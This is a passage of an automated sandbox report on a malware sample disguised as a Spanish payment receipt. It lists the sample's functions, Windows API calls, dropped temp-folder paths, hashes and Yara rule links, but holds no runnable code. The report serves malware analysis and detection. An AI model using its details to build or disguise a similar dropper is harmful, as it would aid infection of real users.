                                                                                                                                                                                    Function 004034AF Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403242,?,?,?,?,?,?,00403847,?), ref: 004034BD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FilePointer
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 973152223-0
                                                                                                                                                                                    • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                    • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                                                                                                                                    • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                                                                                                                                    Function 00404485 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • KiUserCallbackDispatcher.NTDLL(?,0040425C), ref: 0040448F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CallbackDispatcherUser
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2492992576-0
                                                                                                                                                                                    • Opcode ID: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                                                                                                    • Instruction ID: c8b2e0b7737fb6f3a2012ed53d18a955e8c044ab00f5fdb14f1eccf879f4c073
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6342aa29cb2c9815646e1c742645cf47b0e1b8d5e1fd84f5a818bc9ff96277f1
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6FA001B6604500ABDE129FA1EF09D0ABF72EBA4702B418579E28590034CB364961EF1D
                                                                                                                                                                                    Function 00401FA4 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00405569: lstrlenW.KERNEL32(Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000,?), ref: 004055A1
                                                                                                                                                                                      • Part of subcall function 00405569: lstrlenW.KERNEL32(004033ED,Completed,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033ED,00000000), ref: 004055B1
                                                                                                                                                                                      • Part of subcall function 00405569: lstrcatW.KERNEL32(Completed,004033ED,004033ED,Completed,00000000,00418EC0,00000000), ref: 004055C4
                                                                                                                                                                                      • Part of subcall function 00405569: SetWindowTextW.USER32(Completed,Completed), ref: 004055D6
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004055FC
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405616
                                                                                                                                                                                      • Part of subcall function 00405569: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405624
                                                                                                                                                                                      • Part of subcall function 00405AEA: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00426710,00000000,00000000), ref: 00405B13
                                                                                                                                                                                      • Part of subcall function 00405AEA: CloseHandle.KERNEL32(?), ref: 00405B20
                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FEB
                                                                                                                                                                                      • Part of subcall function 0040697F: WaitForSingleObject.KERNEL32(?,00000064), ref: 00406990
                                                                                                                                                                                      • Part of subcall function 0040697F: GetExitCodeProcess.KERNEL32(?,?), ref: 004069B2
                                                                                                                                                                                      • Part of subcall function 0040644E: wsprintfW.USER32 ref: 0040645B
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 2972824698-0
                                                                                                                                                                                    • Opcode ID: 2ab75a58c523acbc0361d9fc04dc8565c439a36a222869eb1b3daa153588a202
                                                                                                                                                                                    • Instruction ID: 8c0427486d29053335645041865d96f0af5997519b71f4a23b4502285a2a7229
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2ab75a58c523acbc0361d9fc04dc8565c439a36a222869eb1b3daa153588a202
                                                                                                                                                                                    • Instruction Fuzzy Hash: 4AF09072904012EBCB21ABA59994E9E72A4DF00318F25413BE102B21E1D77C4E528AAE

                                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                                    Function 00404954 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FB), ref: 004049A3
                                                                                                                                                                                    • SetWindowTextW.USER32(00000000,?), ref: 004049CD
                                                                                                                                                                                    • SHBrowseForFolderW.SHELL32(?), ref: 00404A7E
                                                                                                                                                                                    • CoTaskMemFree.OLE32(00000000), ref: 00404A89
                                                                                                                                                                                    • lstrcmpiW.KERNEL32(: Completed,00423708,00000000,?,?), ref: 00404ABB
                                                                                                                                                                                    • lstrcatW.KERNEL32(?,: Completed), ref: 00404AC7
                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,000003FB,?), ref: 00404AD9
                                                                                                                                                                                      • Part of subcall function 00405B4B: GetDlgItemTextW.USER32(?,?,00000400,00404B10), ref: 00405B5E
                                                                                                                                                                                      • Part of subcall function 0040678E: CharNextW.USER32(?,*?|<>/":,00000000,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 004067F1
                                                                                                                                                                                      • Part of subcall function 0040678E: CharNextW.USER32(?,?,?,00000000,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406800
                                                                                                                                                                                      • Part of subcall function 0040678E: CharNextW.USER32(?,00000000,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406805
                                                                                                                                                                                      • Part of subcall function 0040678E: CharPrevW.USER32(?,?,74DF3420,C:\Users\user\AppData\Local\Temp\,?,004034D2,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004037DA), ref: 00406818
                                                                                                                                                                                    • GetDiskFreeSpaceW.KERNEL32(004216D8,?,?,0000040F,?,004216D8,004216D8,?,00000001,004216D8,?,?,000003FB,?), ref: 00404B9C
                                                                                                                                                                                    • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404BB7
                                                                                                                                                                                      • Part of subcall function 00404D10: lstrlenW.KERNEL32(00423708,00423708,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DB1
                                                                                                                                                                                      • Part of subcall function 00404D10: wsprintfW.USER32 ref: 00404DBA
                                                                                                                                                                                      • Part of subcall function 00404D10: SetDlgItemTextW.USER32(?,00423708), ref: 00404DCD
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                    • String ID: : Completed$A$C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner
                                                                                                                                                                                    • API String ID: 2624150263-39638649
                                                                                                                                                                                    • Opcode ID: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
                                                                                                                                                                                    • Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6bd2bc8b533fb15e6f7c23c87040bd2a6000733d02ac869fbd78df79038ba633
                                                                                                                                                                                    • Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69
                                                                                                                                                                                    Function 004021AA Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CoCreateInstance.OLE32(004084E4,?,00000001,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes, xrefs: 00402269
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: CreateInstance
                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\globosely\baadehavn\stnner\forslvedes
                                                                                                                                                                                    • API String ID: 542301482-2682595351
                                                                                                                                                                                    • Opcode ID: 70a4cfafb3696bf85ab74df719bf6584470e960af5f401986f4556537b1cbe4c
                                                                                                                                                                                    • Instruction ID: 543bd56792285dd9977ebe6a5c934514532920c251de70bc34d4fa366edb348e
                                                                                                                                                                                    • Opcode Fuzzy Hash: 70a4cfafb3696bf85ab74df719bf6584470e960af5f401986f4556537b1cbe4c
                                                                                                                                                                                    • Instruction Fuzzy Hash: 80411771A00209EFCF40DFE4C989E9D7BB5BF49308B20456AF505EB2D1DB799941CB94
                                                                                                                                                                                    Function 0040290B Relevance: 1.5, APIs: 1, Instructions: 30fileCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: FileFindFirst
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1974802433-0
                                                                                                                                                                                    • Opcode ID: 6e339d4586449b2e1fd81fccd2bd3fba9cabc785e87eab91eefa756a7dec7165
                                                                                                                                                                                    • Instruction ID: 26775ad4c1080374fb75430f90045566014d5e2c4dab898babe53efe7e17598a
                                                                                                                                                                                    • Opcode Fuzzy Hash: 6e339d4586449b2e1fd81fccd2bd3fba9cabc785e87eab91eefa756a7dec7165
                                                                                                                                                                                    • Instruction Fuzzy Hash: F3F08271A04104EFD701DBA4DD49AAEB378FF14314F60417BE101F21D0E7B88E129B2A
                                                                                                                                                                                    Function 00404ED0 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003F9), ref: 00404EE8
                                                                                                                                                                                    • GetDlgItem.USER32(?,00000408), ref: 00404EF3
                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000040,?), ref: 00404F3D
                                                                                                                                                                                    • LoadImageW.USER32(0000006E,00000000,00000000,00000000,00000000), ref: 00404F54
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000FC,004054DD), ref: 00404F6D
                                                                                                                                                                                    • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404F81
                                                                                                                                                                                    • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404F93
                                                                                                                                                                                    • SendMessageW.USER32(?,00001109,00000002), ref: 00404FA9
                                                                                                                                                                                    • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404FB5
                                                                                                                                                                                    • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404FC7
                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00404FCA
                                                                                                                                                                                    • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00404FF5
                                                                                                                                                                                    • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405001
                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 0040509C
                                                                                                                                                                                    • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 004050CC
                                                                                                                                                                                      • Part of subcall function 00404498: SendMessageW.USER32(00000028,?,00000001,004042C3), ref: 004044A6
                                                                                                                                                                                    • SendMessageW.USER32(?,00001132,00000000,?), ref: 004050E0
                                                                                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0040510E
                                                                                                                                                                                    • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0040511C
                                                                                                                                                                                    • ShowWindow.USER32(?,00000005), ref: 0040512C
                                                                                                                                                                                    • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405227
                                                                                                                                                                                    • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 0040528C
                                                                                                                                                                                    • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 004052A1
                                                                                                                                                                                    • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 004052C5
                                                                                                                                                                                    • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 004052E5
                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?), ref: 004052FA
                                                                                                                                                                                    • GlobalFree.KERNEL32(?), ref: 0040530A
                                                                                                                                                                                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 00405383
                                                                                                                                                                                    • SendMessageW.USER32(?,00001102,?,?), ref: 0040542C
                                                                                                                                                                                    • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040543B
                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00405466
                                                                                                                                                                                    • ShowWindow.USER32(?,00000000), ref: 004054B4
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003FE), ref: 004054BF
                                                                                                                                                                                    • ShowWindow.USER32(00000000), ref: 004054C6
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                                                                                                                    • String ID: $M$N
                                                                                                                                                                                    • API String ID: 2564846305-813528018
                                                                                                                                                                                    • Opcode ID: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                                                                                                                                                                                    • Instruction ID: f25f8d73efcf6ba6a17deb726488d783a00b9a1a7703c2d4830b1b44d3514242
                                                                                                                                                                                    • Opcode Fuzzy Hash: fcc7e91b83617d145af11aec22520696422ccde9284fa118c4a43dbc05db5981
                                                                                                                                                                                    • Instruction Fuzzy Hash: 34027D70A00609EFDB20DF95CC45AAF7BB5FB84315F10817AE910BA2E1D7798A52CF58
                                                                                                                                                                                    Function 00404622 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004046C0
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004046D4
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004046F1
                                                                                                                                                                                    • GetSysColor.USER32(?), ref: 00404702
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404710
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040471E
                                                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 00404723
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404730
                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404745
                                                                                                                                                                                    • GetDlgItem.USER32(?,0000040A), ref: 0040479E
                                                                                                                                                                                    • SendMessageW.USER32(00000000), ref: 004047A5
                                                                                                                                                                                    • GetDlgItem.USER32(?,000003E8), ref: 004047D0
                                                                                                                                                                                    • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404813
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 00404821
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404824
                                                                                                                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0040483D
                                                                                                                                                                                    • SetCursor.USER32(00000000), ref: 00404840
                                                                                                                                                                                    • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040486F
                                                                                                                                                                                    • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404881
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 00000000.00000002.1740423369.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    • Associated: 00000000.00000002.1740402798.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740445463.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740469990.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    • Associated: 00000000.00000002.1740621563.0000000000454000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_Justificante pago-09453256434687.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                                                                                                                                                                    • String ID: : Completed$N
                                                                                                                                                                                    • API String ID: 3103080414-2140067464
                                                                                                                                                                                    • Opcode ID: 0388ebf4b552688962da2f0e60a0ed45a0ac6c6640f7b9ebe92ad344b143db63
